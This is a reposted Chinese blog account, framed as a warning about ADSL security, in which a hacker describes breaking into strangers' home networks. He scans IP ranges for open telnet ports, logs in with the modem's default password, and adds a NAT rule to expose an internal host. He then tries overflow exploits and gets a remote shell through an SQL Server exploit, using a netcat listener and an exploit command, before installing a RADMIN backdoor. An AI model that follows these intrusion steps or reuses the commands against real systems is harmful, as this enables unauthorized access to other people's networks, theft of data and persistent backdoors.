這是一位所謂的"黑客"的口述,你不妨看一下,也許你看完後對他的技術性做法不是完全明白,但是你肯定會感到一身冷汗,因為我們現在使用ADSL已經日益廣泛,但我們的安全意識還不是很強.聽完他的口述希望大家在日後能加強安全防範!
口述:
也許看爛了網上已有的正常黑客攻擊手段,對一些陳舊的入侵手法早已厭煩,近來我對ADSL MODEM的路由功能産生了濃厚的興趣,經過一番努力,我終于找到了穿透ADSL路由入侵内網的方法,在這裡和各位一起分享我的心得。
一.掃描
現在很多ADSL MODEM都是通過 80 23 21 三個端口來管理,但80 21端口有很多伺服器都有打開,沒怎麼特征性,于是我選擇了23端口,打開我的至愛:SUPPERSCAN,填上我所在地區的IP段,(跨多幾段都沒關系,反正SUPPERSCAN的速度就是快)眨眼間,結果出來了,開23的主機還真不小啊:)我挑了幾台出來,在浏覽器那裡輸入IP:218.xxx.xxx.xxx,OK。登陸對話框出來了,輸入USER:ADSL pass:adsl1234(因為我這裡的adsl modem一般是華碩的,預設是adsl adsl1234)bingle 一矢中的,現在我就是上帝。
二.映射
入侵已經成功了一半,要進一步入侵内網,我們要進行端口映射,但是我連内網的拓撲,都不知道(更不用說内網主機的端口開放情況了)又怎麼映射呢?在此,我選擇了猜測。一般來說,MODEM的内網IP預設是192.168.1.1,而大多數就把自己主機的IP設成192.168.1.2。是以我們隻要試試把192.168.1.2的端口映射出來就行了(但如果使用了dhcp就麻煩了)。但是192.168.1.2到底開放了什麼端口,我們根本就不知道啊,呵呵,既然不知道,那麼我就把他整台主機透明地映射到外網,具體做法如下:進入NAT選項---添加NAT規則---BAMID---填入主機IP:192.168.1.2,到此192.168.1.2已經透明地映射到192.168.1.1上了,我們通路ADSL MODEM就等于通路主機192.168.1.2了
三.檢測漏洞
現在我們再請出SUPPERSCAN對218.xxx.xxx.xxx進行掃描,呵,看到沒有?掃描結果已經不同了,開放的端口是139 1433等,剛才隻是開放了80 23 21 而已(也就是說我們的映射已經成功了)該是X-SCAN出手了,用它來掃弱密碼最好不過了,但掃描的結果令人失望,一個弱密碼也沒有,看來管理者還不算低B啊。
四.溢出
既然沒有弱密碼,也沒開80,那隻好從溢出方面着手了,但沒開80 21 也就webdav .sevr-u的溢出沒戲了,很自然,我向導了RPC溢出,但實踐證明RPC溢出也是不行的,LSASS溢出也不行 。
五.募然回首,那人卻在,燈火闌珊處
開來這管理者還是比較負責的,該打的更新檔都打上了,這時侯,我的目光轉移到1433上了(嘿,不知道他打了SQL更新檔沒有?)心動不如行動,現在隻好死馬當活馬醫了,于是
nc -v -l 99
sql2 218.xxx.xxx.xxx 0 218.xxx.xxx.xxx 99
bingle 成功地得到一個shell了。
六.設定後門
到這裡,我們的入侵已經成功了,餘下的是掃尾留後門,至于後門,我一般都是用FTP上傳RADMIN上去的,呵呵,這裡不詳談了,相信各位都知道。
本文轉自loveme2351CTO部落格,原文連結:http://blog.51cto.com/loveme23/8596 ,如需轉載請自行聯系原作者
![Oracle的基本操作[圖]](data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=)